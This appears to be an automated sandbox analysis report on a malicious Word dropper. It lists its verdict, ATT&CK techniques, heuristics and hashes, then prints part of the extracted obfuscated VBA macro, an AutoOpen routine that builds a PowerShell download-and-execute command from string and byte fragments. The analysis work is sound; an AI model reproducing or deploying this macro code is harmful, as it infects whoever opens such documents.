Verdict: MALICIOUS
Risk Score: 242

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1566.001 Spearphishing Attachment
The sample is a malicious Word document containing a VBA macro with an AutoOpen function. This macro uses Shell() to execute a PowerShell command. The PowerShell command is constructed by concatenating strings and byte arrays, ultimately forming a command to download and execute a second-stage payload. The ClamAV detection 'Doc.Dropper.Agent-6592056-0' further supports its malicious nature as a dropper.
Heuristics (7)

| Finding | Severity | ID | Description |
|---|---|---|---|
| ClamAV: Doc.Dropper.Agent-6592056-0 | critical | CLAMAV_DETECTION | ClamAV detected this file as malware: Doc.Dropper.Agent-6592056-0 |
| VBA macros detected (3 related findings) | medium | OLE_VBA_MACROS | Document contains VBA macro code |
| Shell() call in VBA | critical | OLE_VBA_SHELL | Shell() call in VBA |
| AutoOpen macro | high | OLE_VBA_AUTOOPEN | AutoOpen macro |
| VBA p-code auto-exec with execution tokens | high | OLE_VBA_PCODE_AUTOEXEC_EXEC | Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable. |
| Legacy WordBasic auto-exec macro marker | medium | OLE_LEGACY_WORDBASIC_AUTOEXEC | OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. |
| Embedded URL | info | EMBEDDED_URL | One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). |
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 13385 bytes | 1672e9893d63c030fe4a880c3c0bbc52abcdc40dd75253d3308b17a5d311fc94 |
Preview of the extracted script (first 1,000 lines):

```vb
Attribute VB_Name = "rAzWVtS"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "jmpJVPTbDEXHPl"
Function zkFkO()
On Error Resume Next
jpldp = whiKp
YBaiGQ = CDate(47954)
rIwttU = 86526
SmcvpR = 11523
TjjFc = CByte(zauYn)
INLIP = CDate(NTsbip + Sin(20388 + 24038) * 9741 * CInt(73544))
dzTVa = "OwerSHe" + "ll .( $pSHoME[" + "4]+$psHOMe[34]+" + "'x') ( -" + "jOIn" + " (( 28,1" + "07" + " ,107 ,82, 81,"
wtuwM = HOwwL
NbljX = CDate(71969)
bpiKf = 66209
EwnuIf = 85775
uzdMw = CByte(VZbnaT)
oBuVv = CDate(NhqHbz + Sin(14061 + 70301) * 7230 * CInt(68642))
jVbiaYcn = "91 ,2" + "4, 5 ,24" + ",86,93" + " ,79,21 ,87,90" + ", 82,93, 9" + "1,76, 24 , 7"
BIVOJ = fDsQB
mGzCC = CDate(65179)
HQzan = 67824
uXFzL = 45666
McLYJ = CByte(jkdrdb)
IoDwFL = CDate(thwTId + Sin(64297 + 92157) * 73713 * CInt(73650))
wNmzFM = "4 ,89" + " ,86 " + ",92 , 87" + " ," + "85 ,3 ,28, 8"
ZahIP = jjRtZ
ATCSPr = CDate(27081)
MTwLq = 6000
Rfvwpi = 52886
XUwSqU = CByte(iAZQu)
wCfVY = CDate(ZEDwi + Sin(21327 + 55884) * 60416 * CInt(22046))
RPlvV = "1 , 78,72,1" + "11,91 ,79, 24,5" + " , 24 ," + "86 , 93 , " + "79 ,21 , 8" + "7 ,90,82 ,93 ,"
ElUmFn = sCuTsn
zEfnf = CDate(75109)
SzSHl = 50965
GnYbF = 25010
cmjBUH = CByte(tpKFmZ)
BjWwD = CDate(mcHaWp + Sin(50020 + 6639) * 89941 * CInt(66436))
HnZQNp = "91,7" + "6,24 , 1" + "07 ," + "65 ," + "75" + " , " + "76, 93," + " 85 , 22,118,9" + "3,76 ,22 "
XzlMU = fNawPN
BzTjU = CDate(12188)
QNKQi = 69908
jOiSvz = 82648
zzTEVn = CByte(tSlwsm)
BBcoV = CDate(oYJVXD + Sin(265 + 90393) * 5961 * CInt(52090))
VZMcwG = ", 111 ,93 ,9" + "0, 123 ,84 ,81" + ",93 , 86 ," + " 76 ,3, 28 ,79 " + ",87,106,82, " + "82 , 92, 24 , 5"
zkFkO = dzTVa + jVbiaYcn + wNmzFM + RPlvV + HnZQNp + VZMcwG
End Function
Function YuprzN()
On Error Resume Next
nlQom = tIPNj
zbvsY = CDate(21525)
AwuUJ = 30915
oEGVJq = 51943
omLwY = CByte(MUVDh)
pJZhz = CDate(kzXBq + Sin(84038 + 21780) * 43387 * CInt(11976))
JQjfN = " , 24" + ",31,80 ,76, 76," + " 72, 2, 23 , 23" + " , 79,79 , "
sqCmz = NnJGAw
PQSlW = CDate(81560)
PFLto = 10173
aWwuWY = 17798
TiLVsr = CByte(HGIWj)
SuVhU = CDate(qJiZXz + Sin(63437 + 61094) * 51240 * CInt(58914))
jUksjYT = "79" + " , 22,85, 22,8" + "5 , 89, 9" + "5,86,93," + "76 , 85 , 89 ," + " 74,83," + "93,76 , " + "81 ,"
YjrKV = iBjpH
LpqLvz = CDate(920)
BwAsZh = 70979
jiikV = 24603
zoolO = CByte(fnYVuH)
mJBVZ = CDate(uCtXSc + Sin(31022 + 19853) * 34309 * CInt(21814))
wVZUIaXaAX = "86,95,84" + ",84 ,9" + "1,2" + "2, 91 , 87,85,2"
ihHPbi = WQwzBw
TqAms = CDate(25119)
nQpCll = 59684
RErnkD = 70044
bfiAXf = CByte(WTJqRJ)
ksuzmY = CDate(jdGZqC + Sin(5536 + 42817) * 8660 * CInt(79312))
ViHfBOdIo = "3 ,77 " + ", 118, " + "121 ,0,23" + ", 120,80 , 76, " + "76, 72 , 2 ,23,"
NpwfmS = WUBTw
QIzjb = CDate(13624)
CnpDR = 52237
DNvlC = 14342
UzlLB = CByte(flVQP)
YwLjUm = CDate(XfUZY + Sin(25610 + 38829) * 30638 * CInt(92573))
majLQXw = "23,79 ,79, 79" + " ,22,84,93 ," + "75,8" + "6,81 ,"
YuprzN = JQjfN + jUksjYT + wVZUIaXaAX + ViHfBOdIo + majLQXw
End Function
Function RHMjoHJ()
On Error Resume Next
TnDhb = kRbUCR
joMzkj = CDate(47453)
ORZBq = 199
VRYAjQ = 50999
vsChA = CByte(AVlKA)
QMcbRI = CDate(kwQvpm + Sin(1924 + 52171) * 58155 * CInt(35323))
JnpOJbsRmT = "91 ,80, 81 , 8" + "6 ,22, 74 , 77," + "23" + ",117,108 , 124," + " 1, 10," + "90, 11 ,23," + "120 ,80,7" + "6 , 7" + "6 , 72 ,2,23,"
sYPZV = 29024
UkWIf = SwZjQ
XNArO = CDate(CaOoIF + Sin(43778 + 48506) * 36020 * CInt(92053))
wfNih = CByte(NlXik)
qzhTii = CDate(52899)
Fhuup = 76819
QEWzqOj = "23,79 ," + " 7" + "9 ,79, 2" + "2, 12 ,22 , 86" + " ,81 ,83," + "81" + " , 76 ,89,0" + ",1"
fVTpPm = 44310
RjZsS = pYwXzc
HOLhl = CDate(QkAuHV + Sin(17022 + 33706) * 85176 * CInt(37480))
ZiTRhl = CByte(OuERr)
itoIl = CDate(30352)
hdWNcL = 37219
NOWbquFU = "4,22 ," + " 66, 0, 22, " + "74 ,7 ... (truncated)
```